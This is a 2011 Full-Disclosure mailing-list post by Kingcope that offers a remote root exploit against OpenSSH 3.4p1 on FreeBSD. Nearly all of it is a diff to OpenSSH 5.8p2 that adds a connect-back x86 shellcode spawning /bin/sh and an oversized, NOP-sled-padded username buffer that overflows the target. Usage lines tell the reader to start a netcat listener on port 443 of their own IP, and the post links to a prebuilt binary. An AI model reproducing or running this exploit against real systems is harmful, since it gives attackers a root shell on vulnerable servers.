OpenSSH FreeBSD Remote Root Exploit By Kingcope Year 2011 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924 run like ./ssh -1 -z <yourip> <target> setup a netcat, port 443 on yourip first a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. the statically linked binary can be downloaded from http://isowarez.de/ssh_0day I know these versions are really old, some seem to run that tough. -Cheers, King "the archaeologist" Cope diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c 149a150 > char *myip; 195a197,203 > "OpenSSH FreeBSD Remote Root Exploit\n" > "By Kingcope\n" > "Year 2011\n\n" > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n" > "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n" > "run like ./ssh -1 -z <yourip> <target>\n" > "setup a netcat, port 443 on yourip first\n\n" 299c307 < while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx" --- > while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx" 335a344,346 > break; > case 'z': > myip = optarg; diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c 667a668,719 > //IP=\xc0\xa8\x20\x80 > #define IPADDR "\xc0\xa8\x20\x80" > #define PORT "\x27\x10" /* htons(10000) */ > > char sc[] = > "\x90\x90" > "\x90\x90" > "\x31\xc9" // xor ecx, ecx > "\xf7\xe1" // mul ecx > "\x51" // push ecx > "\x41" // inc ecx > "\x51" // push ecx > "\x41" // inc ecx > "\x51" // push ecx > "\x51" // push ecx > "\xb0\x61" // mov al, 97 > "\xcd\x80" // int 80h > "\x89\xc3" // mov ebx, eax > "\x68"IPADDR // push dword 0101017fh > "\x66\x68"PORT // push word 4135 > "\x66\x51" // push cx > "\x89\xe6" // mov esi, esp > "\xb2\x10" // mov dl, 16 > "\x52" // push edx > "\x56" // push esi > "\x50" // push eax > "\x50" // push eax > "\xb0\x62" // mov al, 98 > "\xcd\x80" // int 80h > "\x41" // inc ecx > "\xb0\x5a" // mov al, 90 > "\x49" // dec ecx > "\x51" // push ecx > "\x53" // push ebx > "\x53" // push ebx > "\xcd\x80" // int 80h > "\x41" // inc ecx > "\xe2\xf5" // loop -10 > "\x51" // push ecx > "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh > "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh > "\x89\xe3" // mov ebx, esp > "\x51" // push ecx > "\x54" // push esp > "\x53" // push ebx > "\x53" // push ebx > "\xb0\xc4\x34\xff" > "\xcd\x80"; // int 80h > > > extern char *myip; > 678a731,748 > > char buffer[100000]; > > printf("OpenSSH Remote Root Exploit\n"); > printf("By Kingcope\n"); > printf("Year 2011\n\n"); > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"); > printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"); > printf("Connect back to: %s:443\n", myip); > > *((unsigned long*)(sc + 21)) = inet_addr(myip); > *((unsigned short*)(sc + 27)) = htons(443); > > memset(buffer, 'V', 8096); > memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702 > memset(buffer+28, '\x90', 65535); > memcpy(buffer+28+65535, sc, sizeof(sc)); > server_user=buffer; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/